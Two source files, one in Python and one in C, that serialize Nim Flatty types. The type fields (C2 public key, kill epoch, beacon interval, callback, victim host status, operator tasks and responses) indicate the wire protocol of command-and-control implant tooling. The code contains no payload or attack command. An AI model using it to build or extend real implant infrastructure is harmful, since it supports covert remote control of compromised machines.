File: flatty.py
"""
Python implementation of Nim's Flatty serialization library for binary compatibility.
This module provides serialization and deserialization of Nim types using the same binary format.
"""

import struct
from typing import Any, Dict, List, Optional, Tuple, Union
from dataclasses import dataclass


@dataclass
class Key:
    """32-byte key compatible with Nim's Key type"""
    data: bytes
    
    def __init__(self, data: Union[bytes, List[int]]):
        if isinstance(data, list):
            data = bytes(data)
        if len(data) != 32:
            raise ValueError("Key must be exactly 32 bytes")
        self.data = data
    
    def __bytes__(self):
        return self.data
    
    def __getitem__(self, index):
        return self.data[index]
    
    def __len__(self):
        return len(self.data)


@dataclass
class Nonce:
    """24-byte nonce compatible with Nim's Nonce type"""
    data: bytes
    
    def __init__(self, data: Union[bytes, List[int]]):
        if isinstance(data, list):
            data = bytes(data)
        if len(data) != 24:
            raise ValueError("Nonce must be exactly 24 bytes")
        self.data = data
    
    def __bytes__(self):
        return self.data
    
    def __getitem__(self, index):
        return self.data[index]


@dataclass
class Mac:
    """16-byte MAC compatible with Nim's Mac type"""
    data: bytes
    
    def __init__(self, data: Union[bytes, List[int]]):
        if isinstance(data, list):
            data = bytes(data)
        if len(data) != 16:
            raise ValueError("Mac must be exactly 16 bytes")
        self.data = data
    
    def __bytes__(self):
        return self.data
    
    def __getitem__(self, index):
        return self.data[index]


@dataclass
class EncObj:
    """Encryption object compatible with Nim's EncObj type"""
    publicKey: Key
    nonce: Nonce  
    mac: Mac
    cipherLen: int
    cipherText: bytes
    
    def __init__(self, publicKey: Union[Key, bytes, List[int]], 
                 nonce: Union[Nonce, bytes, List[int]], 
                 mac: Union[Mac, bytes, List[int]], 
                 cipherLen: int, 
                 cipherText: Union[bytes, List[int]]):
        self.publicKey = publicKey if isinstance(publicKey, Key) else Key(publicKey)
        self.nonce = nonce if isinstance(nonce, Nonce) else Nonce(nonce)
        self.mac = mac if isinstance(mac, Mac) else Mac(mac)
        self.cipherLen = cipherLen
        self.cipherText = cipherText if isinstance(cipherText, bytes) else bytes(cipherText)


@dataclass
class EncConfig:
    """Encrypted configuration compatible with Nim's EncConfig type"""
    privKey: Key
    pubKey: Key
    encObj: EncObj
    
    def __init__(self, privKey: Union[Key, bytes, List[int]], 
                 pubKey: Union[Key, bytes, List[int]], 
                 encObj: EncObj):
        self.privKey = privKey if isinstance(privKey, Key) else Key(privKey)
        self.pubKey = pubKey if isinstance(pubKey, Key) else Key(pubKey)
        self.encObj = encObj


@dataclass
class StaticConfig:
    """Static configuration compatible with Nim's StaticConfig type"""
    buildID: str
    deploymentID: str
    c2PubKey: Key
    killEpoch: int
    interval: int
    callback: str
    
    def __init__(self, buildID: str = "", deploymentID: str = "", 
                 c2PubKey: Union[Key, bytes, List[int], None] = None, 
                 killEpoch: int = 0, interval: int = 0, callback: str = ""):
        self.buildID = buildID
        self.deploymentID = deploymentID
        self.c2PubKey = c2PubKey if isinstance(c2PubKey, Key) else Key(c2PubKey or bytes(32))
        self.killEpoch = killEpoch
        self.interval = interval
        self.callback = callback


@dataclass  
class Status:
    """Status object compatible with Nim's Status type"""
    ip: str
    externalIP: str
    hostname: str
    os: str
    arch: str
    users: str
    bootTime: int
    
    def __init__(self, ip: str = "", externalIP: str = "", hostname: str = "", 
                 os: str = "", arch: str = "", users: str = "", bootTime: int = 0):
        self.ip = ip
        self.externalIP = externalIP
        self.hostname = hostname
        self.os = os
        self.arch = arch
        self.users = users
        self.bootTime = bootTime


@dataclass
class Callback:
    """Callback object compatible with Nim's Callback type"""
    config: StaticConfig
    status: Status
    
    def __init__(self, config: Optional[StaticConfig] = None, 
                 status: Optional[Status] = None):
        self.config = config or StaticConfig()
        self.status = status or Status()


@dataclass
class Task:
    """Task object compatible with Nim's Task type"""
    taskId: str
    taskNum: int
    retrieved: bool
    complete: bool
    arg: str
    resp: str
    
    def __init__(self, taskId: str = "", taskNum: int = 0, retrieved: bool = False,
                 complete: bool = False, arg: str = "", resp: str = ""):
        self.taskId = taskId
        self.taskNum = taskNum
        self.retrieved = retrieved
        self.complete = complete
        self.arg = arg
        self.resp = resp


@dataclass
class Resp:
    """Response object compatible with Nim's Resp type"""
    taskId: str
    resp: str
    
    def __init__(self, taskId: str = "", resp: str = ""):
        self.taskId = taskId
        self.resp = resp


class FlattySerializer:
    """Flatty-compatible binary serializer"""
    
    @staticmethod
    def serialize_string(s: str) -> bytes:
        """Serialize string with length prefix"""
        data = s.encode('utf-8')
        return struct.pack('<Q', len(data)) + data
    
    @staticmethod
    def deserialize_string(data: bytes, offset: int) -> Tuple[str, int]:
        """Deserialize string with length prefix"""
        if len(data) < offset + 8:
            raise ValueError(f"Not enough data to read string length. Need {offset + 8} bytes, got {len(data)}")
        length = struct.unpack('<Q', data[offset:offset+8])[0]
        offset += 8
        if len(data) < offset + length:
            raise ValueError(f"Not enough data to read string content. Need {offset + length} bytes, got {len(data)}")
        string_data = data[offset:offset+length]
        return string_data.decode('utf-8'), offset + length
    
    @staticmethod
    def serialize_int32(value: int) -> bytes:
        """Serialize 32-bit integer"""
        return struct.pack('<i', value)
    
    @staticmethod
    def deserialize_int32(data: bytes, offset: int) -> Tuple[int, int]:
        """Deserialize 32-bit integer"""
        value = struct.unpack('<i', data[offset:offset+4])[0]
        return value, offset + 4
    
    @staticmethod
    def serialize_int64(value: int) -> bytes:
        """Serialize 64-bit integer"""
        return struct.pack('<q', value)
    
    @staticmethod
    def deserialize_int64(data: bytes, offset: int) -> Tuple[int, int]:
        """Deserialize 64-bit integer"""
        value = struct.unpack('<q', data[offset:offset+8])[0]
        return value, offset + 8
    
    @staticmethod
    def serialize_bool(value: bool) -> bytes:
        """Serialize boolean"""
        return b'\x01' if value else b'\x00'
    
    @staticmethod
    def deserialize_bool(data: bytes, offset: int) -> Tuple[bool, int]:
        """Deserialize boolean"""
        return data[offset] == 1, offset + 1
    
    @staticmethod
    def serialize_bytes(data: bytes) -> bytes:
        """Serialize bytes with length prefix"""
        return struct.pack('<Q', len(data)) + data
    
    @staticmethod
    def deserialize_bytes(data: bytes, offset: int) -> Tuple[bytes, int]:
        """Deserialize bytes with length prefix"""
        length = struct.unpack('<Q', data[offset:offset+8])[0]
        offset += 8
        return data[offset:offset+length], offset + length


def to_flatty(obj: Any) -> bytes:
    """Convert object to Flatty binary format"""
    if isinstance(obj, Key):
        return obj.data
    
    elif isinstance(obj, EncConfig):
        result = b""
        # EncConfig is a ref object in Nim, so add the ref indicator byte
        result += b"\x00"
        result += obj.privKey.data
        result += obj.pubKey.data
        result += to_flatty(obj.encObj)
        return result
    
    elif isinstance(obj, EncObj):
        result = b""
        result += obj.publicKey.data
        result += obj.nonce.data
        result += obj.mac.data
        result += FlattySerializer.serialize_int64(obj.cipherLen)
        result += FlattySerializer.serialize_bytes(obj.cipherText)
        return result
    
    elif isinstance(obj, StaticConfig):
        result = b""
        # StaticConfig is a ref object in Nim, so add the ref indicator byte
        result += b"\x00"  # false = not nil
        result += FlattySerializer.serialize_string(obj.buildID)
        result += FlattySerializer.serialize_string(obj.deploymentID)
        result += obj.c2PubKey.data
        result += FlattySerializer.serialize_int32(obj.killEpoch)
        result += FlattySerializer.serialize_int32(obj.interval)
        result += FlattySerializer.serialize_string(obj.callback)
        return result
    
    elif isinstance(obj, Status):
        result = b""
        result += FlattySerializer.serialize_string(obj.ip)
        result += FlattySerializer.serialize_string(obj.externalIP)
        result += FlattySerializer.serialize_string(obj.hostname)
        result += FlattySerializer.serialize_string(obj.os)
        result += FlattySerializer.serialize_string(obj.arch)
        result += FlattySerializer.serialize_string(obj.users)
        result += FlattySerializer.serialize_int64(obj.bootTime)
        return result
    
    elif isinstance(obj, Callback):
        result = b""
        # Callback is a ref object in Nim, so add the ref indicator byte
        result += b"\x00"  # false = not nil
        result += to_flatty(obj.config)
        result += to_flatty(obj.status)
        return result
    
    elif isinstance(obj, Task):
        result = b""
        result += FlattySerializer.serialize_string(obj.taskId)
        result += FlattySerializer.serialize_int64(obj.taskNum)
        result += FlattySerializer.serialize_bool(obj.retrieved)
        result += FlattySerializer.serialize_bool(obj.complete)
        result += FlattySerializer.serialize_string(obj.arg)
        result += FlattySerializer.serialize_string(obj.resp)
        return result
    
    elif isinstance(obj, Resp):
        result = b""
        result += FlattySerializer.serialize_string(obj.taskId)
        result += FlattySerializer.serialize_string(obj.resp)
        return result
    
    else:
        raise ValueError(f"Unsupported type for serialization: {type(obj)}")


def from_flatty(data: bytes, obj_type: type) -> Any:
    """Convert Flatty binary format to object"""
    offset = 0
    
    if obj_type == Key:
        return Key(data)
    
    elif obj_type == EncConfig:
        # Skip the first byte (might be ref object indicator in Nim)
        if data[0] == 0:
            offset = 1
        
        priv_key = Key(data[offset:offset+32])
        offset += 32
        pub_key = Key(data[offset:offset+32])
        offset += 32
        enc_obj, enc_obj_offset = from_flatty(data[offset:], EncObj)
        offset += enc_obj_offset
        return EncConfig(priv_key, pub_key, enc_obj)
    
    elif obj_type == EncObj:
        public_key = Key(data[offset:offset+32])
        offset += 32
        nonce = Nonce(data[offset:offset+24])
        offset += 24
        mac = Mac(data[offset:offset+16])
        offset += 16
        
        # Read cipherLen (int64) 
        cipher_len, offset = FlattySerializer.deserialize_int64(data, offset)
        
        # Read sequence length (int64) for cipherText seq[byte]
        seq_len, offset = FlattySerializer.deserialize_int64(data, offset)
        
        # Verify that cipherLen matches the sequence length
        if cipher_len != seq_len:
            raise ValueError(f"EncObj deserialization error: cipherLen ({cipher_len}) != seq length ({seq_len})")
        
        # Extract cipher text
        cipher_text = data[offset:offset+seq_len]
        offset += seq_len
        
        return EncObj(public_key, nonce, mac, cipher_len, cipher_text), offset
    
    elif obj_type == StaticConfig:
        # StaticConfig is a ref object in Nim - first byte is nil flag
        is_nil = data[offset] == 1
        offset += 1
        
        if is_nil:
            return None  # Handle nil StaticConfig case
        
        build_id, offset = FlattySerializer.deserialize_string(data, offset)
        deployment_id, offset = FlattySerializer.deserialize_string(data, offset)
        c2_pub_key = Key(data[offset:offset+32])
        offset += 32
        kill_epoch, offset = FlattySerializer.deserialize_int32(data, offset)
        interval, offset = FlattySerializer.deserialize_int32(data, offset)
        callback, offset = FlattySerializer.deserialize_string(data, offset)
        return StaticConfig(build_id, deployment_id, c2_pub_key, kill_epoch, interval, callback)
    
    elif obj_type == Status:
        ip, offset = FlattySerializer.deserialize_string(data, offset)
        external_ip, offset = FlattySerializer.deserialize_string(data, offset)
        hostname, offset = FlattySerializer.deserialize_string(data, offset)
        os, offset = FlattySerializer.deserialize_string(data, offset)
        arch, offset = FlattySerializer.deserialize_string(data, offset)
        users, offset = FlattySerializer.deserialize_string(data, offset)
        boot_time, offset = FlattySerializer.deserialize_int64(data, offset)
        return Status(ip, external_ip, hostname, os, arch, users, boot_time)
    
    elif obj_type == Callback:
        # Callback is a ref object in Nim - first byte is nil flag
        is_nil = data[offset] == 1
        offset += 1
        
        if is_nil:
            return None  # Handle nil Callback case
            
        config = from_flatty(data[offset:], StaticConfig)
        # Calculate offset after StaticConfig - need to recompute with nil flag
        temp_data = to_flatty(config)
        offset += len(temp_data)
        status = from_flatty(data[offset:], Status)
        return Callback(config, status)
    
    elif obj_type == Task:
        task_id, offset = FlattySerializer.deserialize_string(data, offset)
        task_num, offset = FlattySerializer.deserialize_int64(data, offset)
        retrieved, offset = FlattySerializer.deserialize_bool(data, offset)
        complete, offset = FlattySerializer.deserialize_bool(data, offset)
        arg, offset = FlattySerializer.deserialize_string(data, offset)
        resp, offset = FlattySerializer.deserialize_string(data, offset)
        return Task(task_id, task_num, retrieved, complete, arg, resp)
    
    elif obj_type == Resp:
        task_id, offset = FlattySerializer.deserialize_string(data, offset)
        resp, offset = FlattySerializer.deserialize_string(data, offset)
        return Resp(task_id, resp)
    
    else:
        raise ValueError(f"Unsupported type for deserialization: {obj_type}")

File: c_implementation/flatty.c
/**
 * Flatty serialization/deserialization implementation
 */

#include "flatty.h"
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

// Helper to write little-endian integers
static void write_le32(uint8_t* buffer, uint32_t value) {
    buffer[0] = (value >>  0) & 0xFF;
    buffer[1] = (value >>  8) & 0xFF;
    buffer[2] = (value >> 16) & 0xFF;
    buffer[3] = (value >> 24) & 0xFF;
}

static void write_le64(uint8_t* buffer, uint64_t value) {
    buffer[0] = (value >>  0) & 0xFF;
    buffer[1] = (value >>  8) & 0xFF;
    buffer[2] = (value >> 16) & 0xFF;
    buffer[3] = (value >> 24) & 0xFF;
    buffer[4] = (value >> 32) & 0xFF;
    buffer[5] = (value >> 40) & 0xFF;
    buffer[6] = (value >> 48) & 0xFF;
    buffer[7] = (value >> 56) & 0xFF;
}

static uint32_t read_le32(const uint8_t* buffer) {
    return ((uint32_t)buffer[0] <<  0) |
           ((uint32_t)buffer[1] <<  8) |
           ((uint32_t)buffer[2] << 16) |
           ((uint32_t)buffer[3] << 24);
}

static uint64_t read_le64(const uint8_t* buffer) {
    return ((uint64_t)buffer[0] <<  0) |
           ((uint64_t)buffer[1] <<  8) |
           ((uint64_t)buffer[2] << 16) |
           ((uint64_t)buffer[3] << 24) |
           ((uint64_t)buffer[4] << 32) |
           ((uint64_t)buffer[5] << 40) |
           ((uint64_t)buffer[6] << 48) |
           ((uint64_t)buffer[7] << 56);
}

// Serialize/deserialize primitives
size_t serialize_string(const char* str, uint8_t* buffer) {
    size_t len = str ? strlen(str) : 0;
    write_le64(buffer, len);
    if (len > 0) {
        memcpy(buffer + 8, str, len);
    }
    return 8 + len;
}

size_t deserialize_string(const uint8_t* buffer, size_t buffer_len, char** str) {
    if (buffer_len < 8) return 0;

    uint64_t len = read_le64(buffer);
    if (buffer_len < 8 + len) return 0;

    *str = (char*)malloc(len + 1);
    if (!*str) return 0;

    if (len > 0) {
        memcpy(*str, buffer + 8, len);
    }
    (*str)[len] = '\0';

    return 8 + len;
}

size_t serialize_int32(int32_t value, uint8_t* buffer) {
    write_le32(buffer, (uint32_t)value);
    return 4;
}

size_t deserialize_int32(const uint8_t* buffer, int32_t* value) {
    *value = (int32_t)read_le32(buffer);
    return 4;
}

size_t serialize_int64(int64_t value, uint8_t* buffer) {
    write_le64(buffer, (uint64_t)value);
    return 8;
}

size_t deserialize_int64(const uint8_t* buffer, int64_t* value) {
    *value = (int64_t)read_le64(buffer);
    return 8;
}

size_t serialize_bool(bool value, uint8_t* buffer) {
    buffer[0] = value ? 1 : 0;
    return 1;
}

size_t deserialize_bool(const uint8_t* buffer, bool* value) {
    *value = buffer[0] != 0;
    return 1;
}

size_t serialize_bytes(const uint8_t* data, size_t len, uint8_t* buffer) {
    write_le64(buffer, len);
    if (len > 0) {
        memcpy(buffer + 8, data, len);
    }
    return 8 + len;
}

size_t deserialize_bytes(const uint8_t* buffer, size_t buffer_len, uint8_t** data, size_t* len) {
    if (buffer_len < 8) return 0;

    *len = read_le64(buffer);
    if (buffer_len < 8 + *len) return 0;

    *data = (uint8_t*)malloc(*len);
    if (!*data) return 0;

    if (*len > 0) {
        memcpy(*data, buffer + 8, *len);
    }

    return 8 + *len;
}

// Key serialization (just the raw 32 bytes)
size_t serialize_key(const Key* key, uint8_t* buffer) {
    memcpy(buffer, key->data, KEY_SIZE);
    return KEY_SIZE;
}

size_t deserialize_key(const uint8_t* buffer, size_t buffer_len, Key* key) {
    if (buffer_len < KEY_SIZE) return 0;
    memcpy(key->data, buffer, KEY_SIZE);
    return KEY_SIZE;
}

// EncObj serialization
size_t serialize_enc_obj(const EncObj* obj, uint8_t* buffer) {
    size_t offset = 0;

    // publicKey (32 bytes)
    memcpy(buffer + offset, obj->publicKey.data, KEY_SIZE);
    offset += KEY_SIZE;

    // nonce (24 bytes)
    memcpy(buffer + offset, obj->nonce.data, NONCE_SIZE);
    offset += NONCE_SIZE;

    // mac (16 bytes)
    memcpy(buffer + offset, obj->mac.data, MAC_SIZE);
    offset += MAC_SIZE;

    // cipherLen (int64)
    offset += serialize_int64(obj->cipherLen, buffer + offset);

    // cipherText (seq[byte])
    offset += serialize_bytes(obj->cipherText, obj->cipherLen, buffer + offset);

    return offset;
}

size_t deserialize_enc_obj(const uint8_t* buffer, size_t buffer_len, EncObj* obj) {
    size_t offset = 0;

    if (buffer_len < KEY_SIZE + NONCE_SIZE + MAC_SIZE + 8 + 8) return 0;

    // publicKey
    memcpy(obj->publicKey.data, buffer + offset, KEY_SIZE);
    offset += KEY_SIZE;

    // nonce
    memcpy(obj->nonce.data, buffer + offset, NONCE_SIZE);
    offset += NONCE_SIZE;

    // mac
    memcpy(obj->mac.data, buffer + offset, MAC_SIZE);
    offset += MAC_SIZE;

    // cipherLen
    offset += deserialize_int64(buffer + offset, &obj->cipherLen);

    // cipherText (seq[byte])
    size_t cipher_len;
    size_t bytes_read = deserialize_bytes(buffer + offset, buffer_len - offset,
                                          &obj->cipherText, &cipher_len);
    if (bytes_read == 0) return 0;
    offset += bytes_read;

    // Verify cipherLen matches
    if (obj->cipherLen != (int64_t)cipher_len) {
        free(obj->cipherText);
        obj->cipherText = NULL;
        return 0;
    }

    return offset;
}

// EncConfig serialization (ref object - starts with nil flag byte)
size_t serialize_enc_config(const EncConfig* config, uint8_t* buffer) {
    size_t offset = 0;

    // Ref object nil flag (0 = not nil)
    buffer[offset++] = 0;

    // privKey
    memcpy(buffer + offset, config->privKey.data, KEY_SIZE);
    offset += KEY_SIZE;

    // pubKey
    memcpy(buffer + offset, config->pubKey.data, KEY_SIZE);
    offset += KEY_SIZE;

    // encObj
    offset += serialize_enc_obj(&config->encObj, buffer + offset);

    return offset;
}

size_t deserialize_enc_config(const uint8_t* buffer, size_t buffer_len, EncConfig* config) {
    size_t offset = 0;

    if (buffer_len < 1) return 0;

    // Check nil flag
    uint8_t nil_flag = buffer[offset++];
    if (nil_flag == 1) return 0; // nil object

    if (buffer_len < 1 + KEY_SIZE + KEY_SIZE) return 0;

    // privKey
    memcpy(config->privKey.data, buffer + offset, KEY_SIZE);
    offset += KEY_SIZE;

    // pubKey
    memcpy(config->pubKey.data, buffer + offset, KEY_SIZE);
    offset += KEY_SIZE;

    // encObj
    size_t enc_obj_size = deserialize_enc_obj(buffer + offset, buffer_len - offset,
                                              &config->encObj);
    if (enc_obj_size == 0) return 0;
    offset += enc_obj_size;

    return offset;
}

// StaticConfig serialization (ref object)
size_t serialize_static_config(const StaticConfig* config, uint8_t* buffer) {
    size_t offset = 0;

    // Ref object nil flag (0 = not nil)
    buffer[offset++] = 0;

    // buildID
    offset += serialize_string(config->buildID, buffer + offset);

    // deploymentID
    offset += serialize_string(config->deploymentID, buffer + offset);

    // c2PubKey
    memcpy(buffer + offset, config->c2PubKey.data, KEY_SIZE);
    offset += KEY_SIZE;

    // killEpoch
    offset += serialize_int32(config->killEpoch, buffer + offset);

    // interval
    offset += serialize_int32(config->interval, buffer + offset);

    // callback
    offset += serialize_string(config->callback, buffer + offset);

    return offset;
}

size_t deserialize_static_config(const uint8_t* buffer, size_t buffer_len, StaticConfig* config) {
    size_t offset = 0;

    if (buffer_len < 1) return 0;

    // Check nil flag
    uint8_t nil_flag = buffer[offset++];
    if (nil_flag == 1) return 0; // nil object

    // buildID
    size_t bytes_read = deserialize_string(buffer + offset, buffer_len - offset,
                                           &config->buildID);
    if (bytes_read == 0) return 0;
    offset += bytes_read;

    // deploymentID
    bytes_read = deserialize_string(buffer + offset, buffer_len - offset,
                                   &config->deploymentID);
    if (bytes_read == 0) {
        free(config->buildID);
        return 0;
    }
    offset += bytes_read;

    // c2PubKey
    if (buffer_len < offset + KEY_SIZE) {
        free(config->buildID);
        free(config->deploymentID);
        return 0;
    }
    memcpy(config->c2PubKey.data, buffer + offset, KEY_SIZE);
    offset += KEY_SIZE;

    // killEpoch
    offset += deserialize_int32(buffer + offset, &config->killEpoch);

    // interval
    offset += deserialize_int32(buffer + offset, &config->interval);

    // callback
    bytes_read = deserialize_string(buffer + offset, buffer_len - offset,
                                   &config->callback);
    if (bytes_read == 0) {
        free(config->buildID);
        free(config->deploymentID);
        return 0;
    }
    offset += bytes_read;

    return offset;
}

// Status serialization
size_t serialize_status(const Status* status, uint8_t* buffer) {
    size_t offset = 0;

    offset += serialize_string(status->ip, buffer + offset);
    offset += serialize_string(status->externalIP, buffer + offset);
    offset += serialize_string(status->hostname, buffer + offset);
    offset += serialize_string(status->os, buffer + offset);
    offset += serialize_string(status->arch, buffer + offset);
    offset += serialize_string(status->users, buffer + offset);
    offset += serialize_int64(status->bootTime, buffer + offset);

    return offset;
}

size_t deserialize_status(const uint8_t* buffer, size_t buffer_len, Status* status) {
    size_t offset = 0;
    size_t bytes_read;

    // ip
    bytes_read = deserialize_string(buffer + offset, buffer_len - offset, &status->ip);
    if (bytes_read == 0) return 0;
    offset += bytes_read;

    // externalIP
    bytes_read = deserialize_string(buffer + offset, buffer_len - offset, &status->externalIP);
    if (bytes_read == 0) goto cleanup_ip;
    offset += bytes_read;

    // hostname
    bytes_read = deserialize_string(buffer + offset, buffer_len - offset, &status->hostname);
    if (bytes_read == 0) goto cleanup_externalIP;
    offset += bytes_read;

    // os
    bytes_read = deserialize_string(buffer + offset, buffer_len - offset, &status->os);
    if (bytes_read == 0) goto cleanup_hostname;
    offset += bytes_read;

    // arch
    bytes_read = deserialize_string(buffer + offset, buffer_len - offset, &status->arch);
    if (bytes_read == 0) goto cleanup_os;
    offset += bytes_read;

    // users
    bytes_read = deserialize_string(buffer + offset, buffer_len - offset, &status->users);
    if (bytes_read == 0) goto cleanup_arch;
    offset += bytes_read;

    // bootTime
    offset += deserialize_int64(buffer + offset, &status->bootTime);

    return offset;

cleanup_arch:
    free(status->arch);
cleanup_os:
    free(status->os);
cleanup_hostname:
    free(status->hostname);
cleanup_externalIP:
    free(status->externalIP);
cleanup_ip:
    free(status->ip);
    return 0;
}

// Callback serialization (ref object)
size_t serialize_callback(const Callback* callback, uint8_t* buffer) {
    size_t offset = 0;

    // Ref object nil flag (0 = not nil)
    buffer[offset++] = 0;

    // config (StaticConfig ref)
    offset += serialize_static_config(callback->config, buffer + offset);

    // status (Status)
    offset += serialize_status(callback->status, buffer + offset);

    return offset;
}

size_t deserialize_callback(const uint8_t* buffer, size_t buffer_len, Callback* callback) {
    size_t offset = 0;

    if (buffer_len < 1) return 0;

    // Check nil flag
    uint8_t nil_flag = buffer[offset++];
    if (nil_flag == 1) return 0; // nil object

    // Allocate config
    callback->config = (StaticConfig*)malloc(sizeof(StaticConfig));
    if (!callback->config) return 0;
    memset(callback->config, 0, sizeof(StaticConfig));

    // Deserialize config
    size_t bytes_read = deserialize_static_config(buffer + offset, buffer_len - offset,
                                                  callback->config);
    if (bytes_read == 0) {
        free(callback->config);
        return 0;
    }
    offset += bytes_read;

    // Allocate status
    callback->status = (Status*)malloc(sizeof(Status));
    if (!callback->status) {
        free_static_config(callback->config);
        free(callback->config);
        return 0;
    }
    memset(callback->status, 0, sizeof(Status));

    // Deserialize status
    bytes_read = deserialize_status(buffer + offset, buffer_len - offset, callback->status);
    if (bytes_read == 0) {
        free_static_config(callback->config);
        free(callback->config);
        free(callback->status);
        return 0;
    }
    offset += bytes_read;

    return offset;
}

// Task serialization
size_t serialize_task(const Task* task, uint8_t* buffer) {
    size_t offset = 0;

    offset += serialize_string(task->taskId, buffer + offset);
    offset += serialize_int64(task->taskNum, buffer + offset);
    offset += serialize_bool(task->retrieved, buffer + offset);
    offset += serialize_bool(task->complete, buffer + offset);
    offset += serialize_string(task->arg, buffer + offset);
    offset += serialize_string(task->resp, buffer + offset);

    return offset;
}

size_t deserialize_task(const uint8_t* buffer, size_t buffer_len, Task* task) {
    size_t offset = 0;
    size_t bytes_read;

    bytes_read = deserialize_string(buffer + offset, buffer_len - offset, &task->taskId);
    if (bytes_read == 0) return 0;
    offset += bytes_read;

    offset += deserialize_int64(buffer + offset, &task->taskNum);
    offset += deserialize_bool(buffer + offset, &task->retrieved);
    offset += deserialize_bool(buffer + offset, &task->complete);

    bytes_read = deserialize_string(buffer + offset, buffer_len - offset, &task->arg);
    if (bytes_read == 0) {
        free(task->taskId);
        return 0;
    }
    offset += bytes_read;

    bytes_read = deserialize_string(buffer + offset, buffer_len - offset, &task->resp);
    if (bytes_read == 0) {
        free(task->taskId);
        free(task->arg);
        return 0;
    }
    offset += bytes_read;

    return offset;
}

// Resp serialization
size_t serialize_resp(const Resp* resp, uint8_t* buffer) {
    size_t offset = 0;

    offset += serialize_string(resp->taskId, buffer + offset);
    offset += serialize_string(resp->resp, buffer + offset);

    return offset;
}

size_t deserialize_resp(const uint8_t* buffer, size_t buffer_len, Resp* resp) {
    size_t offset = 0;
    size_t bytes_read;

    bytes_read = deserialize_string(buffer + offset, buffer_len - offset, &resp->taskId);
    if (bytes_read == 0) return 0;
    offset += bytes_read;

    bytes_read = deserialize_string(buffer + offset, buffer_len - offset, &resp->resp);
    if (bytes_read == 0) {
        free(resp->taskId);
        return 0;
    }
    offset += bytes_read;

    return offset;
}

// Size calculation helpers
size_t calc_enc_obj_size(const EncObj* obj) {
    return KEY_SIZE + NONCE_SIZE + MAC_SIZE + 8 + (8 + obj->cipherLen);
}

size_t calc_enc_config_size(const EncConfig* config) {
    return 1 + KEY_SIZE + KEY_SIZE + calc_enc_obj_size(&config->encObj);
}

size_t calc_static_config_size(const StaticConfig* config) {
    return 1 + // nil flag
           (8 + strlen(config->buildID)) +
           (8 + strlen(config->deploymentID)) +
           KEY_SIZE + 4 + 4 +
           (8 + strlen(config->callback));
}

size_t calc_status_size(const Status* status) {
    return (8 + strlen(status->ip)) +
           (8 + strlen(status->externalIP)) +
           (8 + strlen(status->hostname)) +
           (8 + strlen(status->os)) +
           (8 + strlen(status->arch)) +
           (8 + strlen(status->users)) +
           8;
}

size_t calc_callback_size(const Callback* callback) {
    return 1 + calc_static_config_size(callback->config) +
           calc_status_size(callback->status);
}

size_t calc_task_size(const Task* task) {
    return (8 + strlen(task->taskId)) +
           8 + 1 + 1 +
           (8 + strlen(task->arg)) +
           (8 + strlen(task->resp));
}

size_t calc_resp_size(const Resp* resp) {
    return (8 + strlen(resp->taskId)) +
           (8 + strlen(resp->resp));
}
